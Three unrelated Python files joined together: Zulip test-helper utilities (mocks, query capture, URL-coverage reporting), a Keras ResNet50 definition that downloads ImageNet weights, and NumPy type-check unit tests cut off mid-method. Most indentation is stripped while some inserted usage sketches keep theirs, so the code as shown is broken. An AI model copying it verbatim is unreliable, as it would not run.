from typing import (
cast, Any, Callable, Dict, Generator, Iterable, Iterator, List, Mapping,
Optional, Set, Sized, Tuple, Union, IO, Text, TypeVar
)
from django.core import signing
from django.core.urlresolvers import LocaleRegexURLResolver
from django.conf import settings
from django.test import TestCase, override_settings
from django.test.client import (
BOUNDARY, MULTIPART_CONTENT, encode_multipart,
)
from django.template import loader
from django.http import HttpResponse, HttpResponseRedirect
from django.db.utils import IntegrityError
import zerver.lib.upload
from zerver.lib.upload import S3UploadBackend, LocalUploadBackend
from zerver.lib.avatar import avatar_url
from zerver.lib.cache import get_cache_backend
from zerver.lib.initial_password import initial_password
from zerver.lib.db import TimeTrackingCursor
from zerver.lib.str_utils import force_text
from zerver.lib import cache
from zerver.tornado import event_queue
from zerver.tornado.handlers import allocate_handler_id
from zerver.worker import queue_processors
from zerver.lib.actions import (
check_send_message, create_stream_if_needed, bulk_add_subscriptions,
get_display_recipient, bulk_remove_subscriptions, get_stream_recipient,
)
from zerver.models import (
get_recipient,
get_stream,
get_user,
Client,
Message,
Realm,
Recipient,
Stream,
Subscription,
UserMessage,
UserProfile,
)
from zerver.lib.request import JsonableError
if False:
from zerver.lib.test_case import ZulipTestCase
import collections
import base64
import mock
import os
import re
import sys
import time
import ujson
import unittest
import urllib
from zerver.lib.str_utils import NonBinaryStr
from moto import mock_s3_deprecated
from contextlib import contextmanager
import fakeldap
import ldap
class MockLDAP(fakeldap.MockLDAP):
class LDAPError(ldap.LDAPError):
pass
class INVALID_CREDENTIALS(ldap.INVALID_CREDENTIALS):
pass
class NO_SUCH_OBJECT(ldap.NO_SUCH_OBJECT):
pass
class ALREADY_EXISTS(ldap.ALREADY_EXISTS):
pass
@contextmanager
def stub_event_queue_user_events(event_queue_return: Any, user_events_return: Any) -> Iterator[None]:
with mock.patch('zerver.lib.events.request_event_queue',
return_value=event_queue_return):
with mock.patch('zerver.lib.events.get_user_events',
return_value=user_events_return):
yield
@contextmanager
def simulated_queue_client(client: Callable[..., Any]) -> Iterator[None]:
real_SimpleQueueClient = queue_processors.SimpleQueueClient
queue_processors.SimpleQueueClient = client # type: ignore # https://github.com/JukkaL/mypy/issues/1152
yield
queue_processors.SimpleQueueClient = real_SimpleQueueClient # type: ignore # https://github.com/JukkaL/mypy/issues/1152
@contextmanager
def tornado_redirected_to_list(lst: List[Mapping[str, Any]]) -> Iterator[None]:
real_event_queue_process_notification = event_queue.process_notification
event_queue.process_notification = lambda notice: lst.append(notice)
    # process_notification takes a single parameter called 'notice', while
    # lst.append takes a single parameter called 'object'. Because some code
    # might call process_notification with a keyword argument, mypy does not
    # allow assigning lst.append directly, so we use a lambda whose parameter
    # is explicitly named 'notice' to work around this problem.
yield
event_queue.process_notification = real_event_queue_process_notification
@contextmanager
def simulated_empty_cache() -> Generator[
List[Tuple[str, Union[Text, List[Text]], Text]], None, None]:
cache_queries = [] # type: List[Tuple[str, Union[Text, List[Text]], Text]]
def my_cache_get(key: Text, cache_name: Optional[str]=None) -> Optional[Dict[Text, Any]]:
cache_queries.append(('get', key, cache_name))
return None
def my_cache_get_many(keys, cache_name=None): # nocoverage -- simulated code doesn't use this
# type: (List[Text], Optional[str]) -> Dict[Text, Any]
cache_queries.append(('getmany', keys, cache_name))
return {}
old_get = cache.cache_get
old_get_many = cache.cache_get_many
cache.cache_get = my_cache_get
cache.cache_get_many = my_cache_get_many
yield cache_queries
cache.cache_get = old_get
cache.cache_get_many = old_get_many
@contextmanager
def queries_captured(include_savepoints: bool=False) -> Generator[
List[Dict[str, Union[str, bytes]]], None, None]:
'''
Allow a user to capture just the queries executed during
the with statement.
'''
queries = [] # type: List[Dict[str, Union[str, bytes]]]
def wrapper_execute(self: TimeTrackingCursor,
action: Callable[[NonBinaryStr, Iterable[Any]], None],
sql: NonBinaryStr,
params: Iterable[Any]=()) -> None:
cache = get_cache_backend(None)
cache.clear()
start = time.time()
try:
return action(sql, params)
finally:
stop = time.time()
duration = stop - start
if include_savepoints or ('SAVEPOINT' not in sql):
queries.append({
'sql': self.mogrify(sql, params).decode('utf-8'),
'time': "%.3f" % duration,
})
old_execute = TimeTrackingCursor.execute
old_executemany = TimeTrackingCursor.executemany
def cursor_execute(self: TimeTrackingCursor, sql: NonBinaryStr,
params: Iterable[Any]=()) -> None:
return wrapper_execute(self, super(TimeTrackingCursor, self).execute, sql, params) # type: ignore # https://github.com/JukkaL/mypy/issues/1167
TimeTrackingCursor.execute = cursor_execute # type: ignore # https://github.com/JukkaL/mypy/issues/1167
def cursor_executemany(self: TimeTrackingCursor, sql: NonBinaryStr,
params: Iterable[Any]=()) -> None:
return wrapper_execute(self, super(TimeTrackingCursor, self).executemany, sql, params) # type: ignore # https://github.com/JukkaL/mypy/issues/1167 # nocoverage -- doesn't actually get used in tests
TimeTrackingCursor.executemany = cursor_executemany # type: ignore # https://github.com/JukkaL/mypy/issues/1167
yield queries
TimeTrackingCursor.execute = old_execute # type: ignore # https://github.com/JukkaL/mypy/issues/1167
TimeTrackingCursor.executemany = old_executemany # type: ignore # https://github.com/JukkaL/mypy/issues/1167
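# Hedged usage sketch (not part of the original helpers): capturing the SQL
# executed inside the block; each entry is a dict with 'sql' and 'time' keys.
# The helper name and the ORM call are illustrative only.
def _demo_queries_captured() -> List[Dict[str, Union[str, bytes]]]:
    with queries_captured() as queries:
        UserProfile.objects.count()  # any ORM call made here is recorded
    return queries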
@contextmanager
def stdout_suppressed() -> Iterator[IO[str]]:
"""Redirect stdout to /dev/null."""
with open(os.devnull, 'a') as devnull:
stdout, sys.stdout = sys.stdout, devnull
yield stdout
sys.stdout = stdout
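# Hedged usage sketch (not part of the original helpers): any print output in
# the block goes to /dev/null; the original stream is yielded in case the
# caller still needs it. The helper name is hypothetical.
def _demo_stdout_suppressed() -> None:
    with stdout_suppressed():
        print('this line is swallowed by /dev/null')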
def get_test_image_file(filename: str) -> IO[Any]:
test_avatar_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '../tests/images'))
return open(os.path.join(test_avatar_dir, filename), 'rb')
def avatar_disk_path(user_profile: UserProfile, medium: bool=False) -> Text:
avatar_url_path = avatar_url(user_profile, medium)
avatar_disk_path = os.path.join(settings.LOCAL_UPLOADS_DIR, "avatars",
avatar_url_path.split("/")[-2],
avatar_url_path.split("/")[-1].split("?")[0])
return avatar_disk_path
def make_client(name: str) -> Client:
client, _ = Client.objects.get_or_create(name=name)
return client
def find_key_by_email(address: Text) -> Optional[Text]:
from django.core.mail import outbox
key_regex = re.compile("accounts/do_confirm/([a-z0-9]{24})>")
for message in reversed(outbox):
if address in message.to:
return key_regex.search(message.body).groups()[0]
return None # nocoverage -- in theory a test might want this case, but none do
def message_stream_count(user_profile: UserProfile) -> int:
return UserMessage.objects. \
select_related("message"). \
filter(user_profile=user_profile). \
count()
def most_recent_usermessage(user_profile: UserProfile) -> UserMessage:
query = UserMessage.objects. \
select_related("message"). \
filter(user_profile=user_profile). \
order_by('-message')
return query[0] # Django does LIMIT here
def most_recent_message(user_profile: UserProfile) -> Message:
usermessage = most_recent_usermessage(user_profile)
return usermessage.message
def get_subscription(stream_name: Text, user_profile: UserProfile) -> Subscription:
stream = get_stream(stream_name, user_profile.realm)
recipient = get_stream_recipient(stream.id)
return Subscription.objects.get(user_profile=user_profile,
recipient=recipient, active=True)
def get_user_messages(user_profile: UserProfile) -> List[Message]:
query = UserMessage.objects. \
select_related("message"). \
filter(user_profile=user_profile). \
order_by('message')
return [um.message for um in query]
class DummyHandler:
def __init__(self) -> None:
allocate_handler_id(self) # type: ignore # this is a testing mock
class POSTRequestMock:
method = "POST"
def __init__(self, post_data: Dict[str, Any], user_profile: Optional[UserProfile]) -> None:
self.GET = {} # type: Dict[str, Any]
self.POST = post_data
self.user = user_profile
self._tornado_handler = DummyHandler()
self._log_data = {} # type: Dict[str, Any]
self.META = {'PATH_INFO': 'test'}
self.path = ''
class HostRequestMock:
"""A mock request object where get_host() works. Useful for testing
routes that use Zulip's subdomains feature"""
    def __init__(self, user_profile: Optional[UserProfile]=None, host: Text=settings.EXTERNAL_HOST) -> None:
self.host = host
self.GET = {} # type: Dict[str, Any]
self.POST = {} # type: Dict[str, Any]
self.META = {'PATH_INFO': 'test'}
self.path = ''
self.user = user_profile
self.method = ''
self.body = ''
self.content_type = ''
self._email = ''
def get_host(self) -> Text:
return self.host
class MockPythonResponse:
def __init__(self, text: Text, status_code: int) -> None:
self.text = text
self.status_code = status_code
@property
def ok(self) -> bool:
return self.status_code == 200
INSTRUMENTING = os.environ.get('TEST_INSTRUMENT_URL_COVERAGE', '') == 'TRUE'
INSTRUMENTED_CALLS = [] # type: List[Dict[str, Any]]
UrlFuncT = Callable[..., HttpResponse] # TODO: make more specific
def append_instrumentation_data(data: Dict[str, Any]) -> None:
INSTRUMENTED_CALLS.append(data)
def instrument_url(f: UrlFuncT) -> UrlFuncT:
if not INSTRUMENTING: # nocoverage -- option is always enabled; should we remove?
return f
else:
def wrapper(self: 'ZulipTestCase', url: Text, info: Dict[str, Any]={},
**kwargs: Any) -> HttpResponse:
start = time.time()
result = f(self, url, info, **kwargs)
delay = time.time() - start
test_name = self.id()
if '?' in url:
url, extra_info = url.split('?', 1)
else:
extra_info = ''
append_instrumentation_data(dict(
url=url,
status_code=result.status_code,
method=f.__name__,
delay=delay,
extra_info=extra_info,
info=info,
test_name=test_name,
kwargs=kwargs))
return result
return wrapper
def write_instrumentation_reports(full_suite: bool) -> None:
if INSTRUMENTING:
calls = INSTRUMENTED_CALLS
from zproject.urls import urlpatterns, v1_api_and_json_patterns
# Find our untested urls.
pattern_cnt = collections.defaultdict(int) # type: Dict[str, int]
def re_strip(r: Any) -> str:
return str(r).lstrip('^').rstrip('$')
def find_patterns(patterns: List[Any], prefixes: List[str]) -> None:
for pattern in patterns:
find_pattern(pattern, prefixes)
def cleanup_url(url: str) -> str:
if url.startswith('/'):
url = url[1:]
if url.startswith('http://testserver/'):
url = url[len('http://testserver/'):]
if url.startswith('http://zulip.testserver/'):
url = url[len('http://zulip.testserver/'):]
if url.startswith('http://testserver:9080/'):
url = url[len('http://testserver:9080/'):]
return url
def find_pattern(pattern: Any, prefixes: List[str]) -> None:
            if isinstance(pattern, LocaleRegexURLResolver):
return # nocoverage -- shouldn't actually happen
if hasattr(pattern, 'url_patterns'):
return
canon_pattern = prefixes[0] + re_strip(pattern.regex.pattern)
cnt = 0
for call in calls:
if 'pattern' in call:
continue
url = cleanup_url(call['url'])
for prefix in prefixes:
if url.startswith(prefix):
match_url = url[len(prefix):]
if pattern.regex.match(match_url):
if call['status_code'] in [200, 204, 301, 302]:
cnt += 1
call['pattern'] = canon_pattern
pattern_cnt[canon_pattern] += cnt
find_patterns(urlpatterns, ['', 'en/', 'de/'])
find_patterns(v1_api_and_json_patterns, ['api/v1/', 'json/'])
assert len(pattern_cnt) > 100
untested_patterns = set([p for p in pattern_cnt if pattern_cnt[p] == 0])
exempt_patterns = set([
# We exempt some patterns that are called via Tornado.
'api/v1/events',
'api/v1/register',
# We also exempt some development environment debugging
# static content URLs, since the content they point to may
# or may not exist.
'coverage/(?P<path>.*)',
'node-coverage/(?P<path>.*)',
'docs/(?P<path>.*)',
])
untested_patterns -= exempt_patterns
var_dir = 'var' # TODO make sure path is robust here
fn = os.path.join(var_dir, 'url_coverage.txt')
with open(fn, 'w') as f:
for call in calls:
try:
line = ujson.dumps(call)
f.write(line + '\n')
except OverflowError: # nocoverage -- test suite error handling
print('''
A JSON overflow error was encountered while
producing the URL coverage report. Sometimes
this indicates that a test is passing objects
into methods like client_post(), which is
unnecessary and leads to false positives.
''')
print(call)
if full_suite:
print('INFO: URL coverage report is in %s' % (fn,))
print('INFO: Try running: ./tools/create-test-api-docs')
if full_suite and len(untested_patterns): # nocoverage -- test suite error handling
print("\nERROR: Some URLs are untested! Here's the list of untested URLs:")
for untested_pattern in sorted(untested_patterns):
print(" %s" % (untested_pattern,))
sys.exit(1)
def get_all_templates() -> List[str]:
templates = []
relpath = os.path.relpath
isfile = os.path.isfile
path_exists = os.path.exists
def is_valid_template(p: Text, n: Text) -> bool:
return 'webhooks' not in p \
and not n.startswith('.') \
and not n.startswith('__init__') \
and not n.endswith('.md') \
and not n.endswith('.source.html') \
and isfile(p)
def process(template_dir: str, dirname: str, fnames: Iterable[str]) -> None:
for name in fnames:
path = os.path.join(dirname, name)
if is_valid_template(path, name):
templates.append(relpath(path, template_dir))
for engine in loader.engines.all():
template_dirs = [d for d in engine.template_dirs if path_exists(d)]
for template_dir in template_dirs:
template_dir = os.path.normpath(template_dir)
for dirpath, dirnames, fnames in os.walk(template_dir):
process(template_dir, dirpath, fnames)
return templates
def load_subdomain_token(response: HttpResponse) -> Dict[str, Any]:
assert isinstance(response, HttpResponseRedirect)
token = response.url.rsplit('/', 1)[1]
return signing.loads(token, salt='zerver.views.auth.log_into_subdomain')
FuncT = TypeVar('FuncT', bound=Callable[..., None])
def use_s3_backend(method: FuncT) -> FuncT:
@mock_s3_deprecated
@override_settings(LOCAL_UPLOADS_DIR=None)
def new_method(*args: Any, **kwargs: Any) -> Any:
zerver.lib.upload.upload_backend = S3UploadBackend()
try:
return method(*args, **kwargs)
finally:
zerver.lib.upload.upload_backend = LocalUploadBackend()
return new_method
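# Hedged usage sketch (not part of the original helpers): a test wrapped with
# use_s3_backend runs against the mocked S3 backend and is restored to local
# uploads afterwards. The test name and body are hypothetical.
def _demo_use_s3_backend() -> None:
    @use_s3_backend
    def test_s3_avatar_upload(self: 'ZulipTestCase') -> None:
        pass  # calls into zerver.lib.upload here hit S3UploadBackend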
|
|
'''
Taken from https://github.com/fchollet/deep-learning-models
ResNet50 model for Keras.
# Reference:
- [Deep Residual Learning for Image Recognition](https://arxiv.org/abs/1512.03385)
Adapted from code contributed by BigMoyan.
'''
from __future__ import print_function
import numpy as np
import warnings
from keras.layers import merge, Input
from keras.layers import Dense, Activation, Flatten
from keras.layers import Convolution2D, MaxPooling2D, ZeroPadding2D, AveragePooling2D
from keras.layers import BatchNormalization
from keras.models import Model
from keras.preprocessing import image
import keras.backend as K
from keras.utils.layer_utils import convert_all_kernels_in_model
from keras.utils.data_utils import get_file
from .imagenet_utils import decode_predictions, preprocess_input
TH_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.2/resnet50_weights_th_dim_ordering_th_kernels.h5'
TF_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.2/resnet50_weights_tf_dim_ordering_tf_kernels.h5'
TH_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.2/resnet50_weights_th_dim_ordering_th_kernels_notop.h5'
TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.2/resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5'
def identity_block(input_tensor, kernel_size, filters, stage, block):
'''The identity_block is the block that has no conv layer at shortcut
# Arguments
input_tensor: input tensor
        kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
'''
nb_filter1, nb_filter2, nb_filter3 = filters
if K.image_dim_ordering() == 'tf':
bn_axis = 3
else:
bn_axis = 1
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = Convolution2D(nb_filter1, 1, 1, name=conv_name_base + '2a')(input_tensor)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a')(x)
x = Activation('relu')(x)
x = Convolution2D(nb_filter2, kernel_size, kernel_size,
border_mode='same', name=conv_name_base + '2b')(x)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b')(x)
x = Activation('relu')(x)
x = Convolution2D(nb_filter3, 1, 1, name=conv_name_base + '2c')(x)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c')(x)
x = merge([x, input_tensor], mode='sum')
x = Activation('relu')(x)
return x
def conv_block(input_tensor, kernel_size, filters, stage, block, strides=(2, 2)):
'''conv_block is the block that has a conv layer at shortcut
# Arguments
input_tensor: input tensor
        kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
Note that from stage 3, the first conv layer at main path is with subsample=(2,2)
And the shortcut should have subsample=(2,2) as well
'''
nb_filter1, nb_filter2, nb_filter3 = filters
if K.image_dim_ordering() == 'tf':
bn_axis = 3
else:
bn_axis = 1
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = Convolution2D(nb_filter1, 1, 1, subsample=strides,
name=conv_name_base + '2a')(input_tensor)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a')(x)
x = Activation('relu')(x)
x = Convolution2D(nb_filter2, kernel_size, kernel_size, border_mode='same',
name=conv_name_base + '2b')(x)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b')(x)
x = Activation('relu')(x)
x = Convolution2D(nb_filter3, 1, 1, name=conv_name_base + '2c')(x)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c')(x)
shortcut = Convolution2D(nb_filter3, 1, 1, subsample=strides,
name=conv_name_base + '1')(input_tensor)
shortcut = BatchNormalization(axis=bn_axis, name=bn_name_base + '1')(shortcut)
x = merge([x, shortcut], mode='sum')
x = Activation('relu')(x)
return x
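# Illustrative sketch (not in the original file): a minimal residual stage
# built from the two blocks above. With the default strides=(2, 2), conv_block
# halves the spatial dimensions; identity_block then preserves shape so its
# shortcut can be a plain sum. The stage/block labels are hypothetical.
def _demo_residual_stage(input_tensor):
    x = conv_block(input_tensor, 3, [64, 64, 256], stage=9, block='a')
    x = identity_block(x, 3, [64, 64, 256], stage=9, block='b')
    return x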
def ResNet50(include_top=True, weights='imagenet',
input_tensor=None):
'''Instantiate the ResNet50 architecture,
optionally loading weights pre-trained
on ImageNet. Note that when using TensorFlow,
for best performance you should set
`image_dim_ordering="tf"` in your Keras config
at ~/.keras/keras.json.
The model and the weights are compatible with both
TensorFlow and Theano. The dimension ordering
convention used by the model is the one
specified in your Keras config file.
# Arguments
include_top: whether to include the 3 fully-connected
layers at the top of the network.
weights: one of `None` (random initialization)
or "imagenet" (pre-training on ImageNet).
        input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)
to use as image input for the model.
# Returns
A Keras model instance.
'''
if weights not in {'imagenet', None}:
raise ValueError('The `weights` argument should be either '
'`None` (random initialization) or `imagenet` '
'(pre-training on ImageNet).')
    # Determine proper input shape and input layer
    if K.image_dim_ordering() == 'th':
        input_shape = (3, 224, 224) if include_top else (3, None, None)
    else:
        input_shape = (224, 224, 3) if include_top else (None, None, 3)
    if input_tensor is None:
        img_input = Input(shape=input_shape)
    else:
        img_input = (input_tensor if K.is_keras_tensor(input_tensor)
                     else Input(tensor=input_tensor, shape=input_shape))
if K.image_dim_ordering() == 'tf':
bn_axis = 3
else:
bn_axis = 1
x = ZeroPadding2D((3, 3))(img_input)
x = Convolution2D(64, 7, 7, subsample=(2, 2), name='conv1')(x)
x = BatchNormalization(axis=bn_axis, name='bn_conv1')(x)
x = Activation('relu')(x)
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1))
x = identity_block(x, 3, [64, 64, 256], stage=2, block='b')
x = identity_block(x, 3, [64, 64, 256], stage=2, block='c')
x = conv_block(x, 3, [128, 128, 512], stage=3, block='a')
x = identity_block(x, 3, [128, 128, 512], stage=3, block='b')
x = identity_block(x, 3, [128, 128, 512], stage=3, block='c')
x = identity_block(x, 3, [128, 128, 512], stage=3, block='d')
x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a')
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='b')
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='c')
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='d')
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='e')
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='f')
x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a')
x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b')
x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c')
x = AveragePooling2D((7, 7), name='avg_pool')(x)
if include_top:
x = Flatten()(x)
x = Dense(1000, activation='softmax', name='pred')(x)
model = Model(img_input, x)
# load weights
if weights == 'imagenet':
print('K.image_dim_ordering:', K.image_dim_ordering())
if K.image_dim_ordering() == 'th':
if include_top:
weights_path = get_file('resnet50_weights_th_dim_ordering_th_kernels.h5',
TH_WEIGHTS_PATH,
cache_subdir='models',
md5_hash='1c1f8f5b0c8ee28fe9d950625a230e1c')
else:
weights_path = get_file('resnet50_weights_th_dim_ordering_th_kernels_notop.h5',
TH_WEIGHTS_PATH_NO_TOP,
cache_subdir='models',
md5_hash='f64f049c92468c9affcd44b0976cdafe')
model.load_weights(weights_path)
if K.backend() == 'tensorflow':
warnings.warn('You are using the TensorFlow backend, yet you '
'are using the Theano '
'image dimension ordering convention '
'(`image_dim_ordering="th"`). '
'For best performance, set '
'`image_dim_ordering="tf"` in '
'your Keras config '
'at ~/.keras/keras.json.')
convert_all_kernels_in_model(model)
else:
if include_top:
weights_path = get_file('resnet50_weights_tf_dim_ordering_tf_kernels.h5',
TF_WEIGHTS_PATH,
cache_subdir='models',
md5_hash='a7b3fe01876f51b976af0dea6bc144eb')
else:
weights_path = get_file('resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5',
TF_WEIGHTS_PATH_NO_TOP,
cache_subdir='models',
md5_hash='a268eb855778b3df3c7506639542a6af')
model.load_weights(weights_path)
if K.backend() == 'theano':
convert_all_kernels_in_model(model)
return model
if __name__ == '__main__':
model = ResNet50(include_top=True, weights='imagenet')
img_path = 'elephant.jpg'
img = image.load_img(img_path, target_size=(224, 224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
print('Input image shape:', x.shape)
preds = model.predict(x)
print('Predicted:', decode_predictions(preds))
|
|
import numpy as np
from numpy.testing import (
assert_, assert_equal, assert_array_equal, assert_raises
)
from numpy.lib.type_check import (
common_type, mintypecode, isreal, iscomplex, isposinf, isneginf,
nan_to_num, isrealobj, iscomplexobj, asfarray, real_if_close
)
def assert_all(x):
assert_(np.all(x), x)
class TestCommonType:
def test_basic(self):
ai32 = np.array([[1, 2], [3, 4]], dtype=np.int32)
af16 = np.array([[1, 2], [3, 4]], dtype=np.float16)
af32 = np.array([[1, 2], [3, 4]], dtype=np.float32)
af64 = np.array([[1, 2], [3, 4]], dtype=np.float64)
acs = np.array([[1+5j, 2+6j], [3+7j, 4+8j]], dtype=np.csingle)
acd = np.array([[1+5j, 2+6j], [3+7j, 4+8j]], dtype=np.cdouble)
assert_(common_type(ai32) == np.float64)
assert_(common_type(af16) == np.float16)
assert_(common_type(af32) == np.float32)
assert_(common_type(af64) == np.float64)
assert_(common_type(acs) == np.csingle)
assert_(common_type(acd) == np.cdouble)
class TestMintypecode:
def test_default_1(self):
for itype in '1bcsuwil':
assert_equal(mintypecode(itype), 'd')
assert_equal(mintypecode('f'), 'f')
assert_equal(mintypecode('d'), 'd')
assert_equal(mintypecode('F'), 'F')
assert_equal(mintypecode('D'), 'D')
def test_default_2(self):
for itype in '1bcsuwil':
assert_equal(mintypecode(itype+'f'), 'f')
assert_equal(mintypecode(itype+'d'), 'd')
assert_equal(mintypecode(itype+'F'), 'F')
assert_equal(mintypecode(itype+'D'), 'D')
assert_equal(mintypecode('ff'), 'f')
assert_equal(mintypecode('fd'), 'd')
assert_equal(mintypecode('fF'), 'F')
assert_equal(mintypecode('fD'), 'D')
assert_equal(mintypecode('df'), 'd')
assert_equal(mintypecode('dd'), 'd')
#assert_equal(mintypecode('dF',savespace=1),'F')
assert_equal(mintypecode('dF'), 'D')
assert_equal(mintypecode('dD'), 'D')
assert_equal(mintypecode('Ff'), 'F')
#assert_equal(mintypecode('Fd',savespace=1),'F')
assert_equal(mintypecode('Fd'), 'D')
assert_equal(mintypecode('FF'), 'F')
assert_equal(mintypecode('FD'), 'D')
assert_equal(mintypecode('Df'), 'D')
assert_equal(mintypecode('Dd'), 'D')
assert_equal(mintypecode('DF'), 'D')
assert_equal(mintypecode('DD'), 'D')
def test_default_3(self):
assert_equal(mintypecode('fdF'), 'D')
#assert_equal(mintypecode('fdF',savespace=1),'F')
assert_equal(mintypecode('fdD'), 'D')
assert_equal(mintypecode('fFD'), 'D')
assert_equal(mintypecode('dFD'), 'D')
assert_equal(mintypecode('ifd'), 'd')
assert_equal(mintypecode('ifF'), 'F')
assert_equal(mintypecode('ifD'), 'D')
assert_equal(mintypecode('idF'), 'D')
#assert_equal(mintypecode('idF',savespace=1),'F')
assert_equal(mintypecode('idD'), 'D')
class TestIsscalar:
def test_basic(self):
assert_(np.isscalar(3))
assert_(not np.isscalar([3]))
assert_(not np.isscalar((3,)))
assert_(np.isscalar(3j))
assert_(np.isscalar(4.0))
class TestReal:
def test_real(self):
y = np.random.rand(10,)
assert_array_equal(y, np.real(y))
y = np.array(1)
out = np.real(y)
assert_array_equal(y, out)
assert_(isinstance(out, np.ndarray))
y = 1
out = np.real(y)
assert_equal(y, out)
assert_(not isinstance(out, np.ndarray))
def test_cmplx(self):
y = np.random.rand(10,)+1j*np.random.rand(10,)
assert_array_equal(y.real, np.real(y))
y = np.array(1 + 1j)
out = np.real(y)
assert_array_equal(y.real, out)
assert_(isinstance(out, np.ndarray))
y = 1 + 1j
out = np.real(y)
assert_equal(1.0, out)
assert_(not isinstance(out, np.ndarray))
class TestImag:
def test_real(self):
y = np.random.rand(10,)
assert_array_equal(0, np.imag(y))
y = np.array(1)
out = np.imag(y)
assert_array_equal(0, out)
assert_(isinstance(out, np.ndarray))
y = 1
out = np.imag(y)
assert_equal(0, out)
assert_(not isinstance(out, np.ndarray))
def test_cmplx(self):
y = np.random.rand(10,)+1j*np.random.rand(10,)
assert_array_equal(y.imag, np.imag(y))
y = np.array(1 + 1j)
out = np.imag(y)
assert_array_equal(y.imag, out)
assert_(isinstance(out, np.ndarray))
y = 1 + 1j
out = np.imag(y)
assert_equal(1.0, out)
assert_(not isinstance(out, np.ndarray))
class TestIscomplex:
def test_fail(self):
z = np.array([-1, 0, 1])
res = iscomplex(z)
assert_(not np.sometrue(res, axis=0))
def test_pass(self):
z = np.array([-1j, 1, 0])
res = iscomplex(z)
assert_array_equal(res, [1, 0, 0])
class TestIsreal:
def test_pass(self):
z = np.array([-1, 0, 1j])
res = isreal(z)
assert_array_equal(res, [1, 1, 0])
def test_fail(self):
z = np.array([-1j, 1, 0])
res = isreal(z)
assert_array_equal(res, [0, 1, 1])
class TestIscomplexobj:
def test_basic(self):
z = np.array([-1, 0, 1])
assert_(not iscomplexobj(z))
z = np.array([-1j, 0, -1])
assert_(iscomplexobj(z))
def test_scalar(self):
assert_(not iscomplexobj(1.0))
assert_(iscomplexobj(1+0j))
def test_list(self):
assert_(iscomplexobj([3, 1+0j, True]))
assert_(not iscomplexobj([3, 1, True]))
def test_duck(self):
class DummyComplexArray:
@property
def dtype(self):
return np.dtype(complex)
dummy = DummyComplexArray()
assert_(iscomplexobj(dummy))
def test_pandas_duck(self):
# This tests a custom np.dtype duck-typed class, such as used by pandas
# (pandas.core.dtypes)
class PdComplex(np.complex128):
pass
class PdDtype:
name = 'category'
names = None
type = PdComplex
kind = 'c'
str = '<c16'
base = np.dtype('complex128')
class DummyPd:
@property
def dtype(self):
return PdDtype
dummy = DummyPd()
assert_(iscomplexobj(dummy))
def test_custom_dtype_duck(self):
class MyArray(list):
@property
def dtype(self):
return complex
a = MyArray([1+0j, 2+0j, 3+0j])
assert_(iscomplexobj(a))
class TestIsrealobj:
def test_basic(self):
z = np.array([-1, 0, 1])
assert_(isrealobj(z))
z = np.array([-1j, 0, -1])
assert_(not isrealobj(z))
class TestIsnan:
def test_goodvalues(self):
z = np.array((-1., 0., 1.))
res = np.isnan(z) == 0
assert_all(np.all(res, axis=0))
def test_posinf(self):
with np.errstate(divide='ignore'):
assert_all(np.isnan(np.array((1.,))/0.) == 0)
def test_neginf(self):
with np.errstate(divide='ignore'):
assert_all(np.isnan(np.array((-1.,))/0.) == 0)
def test_ind(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isnan(np.array((0.,))/0.) == 1)
def test_integer(self):
assert_all(np.isnan(1) == 0)
def test_complex(self):
assert_all(np.isnan(1+1j) == 0)
def test_complex1(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isnan(np.array(0+0j)/0.) == 1)
class TestIsfinite:
# Fixme, wrong place, isfinite now ufunc
def test_goodvalues(self):
z = np.array((-1., 0., 1.))
res = np.isfinite(z) == 1
assert_all(np.all(res, axis=0))
def test_posinf(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isfinite(np.array((1.,))/0.) == 0)
def test_neginf(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isfinite(np.array((-1.,))/0.) == 0)
def test_ind(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isfinite(np.array((0.,))/0.) == 0)
def test_integer(self):
assert_all(np.isfinite(1) == 1)
def test_complex(self):
assert_all(np.isfinite(1+1j) == 1)
def test_complex1(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isfinite(np.array(1+1j)/0.) == 0)
class TestIsinf:
# Fixme, wrong place, isinf now ufunc
def test_goodvalues(self):
z = np.array((-1., 0., 1.))
res = np.isinf(z) == 0
assert_all(np.all(res, axis=0))
def test_posinf(self):
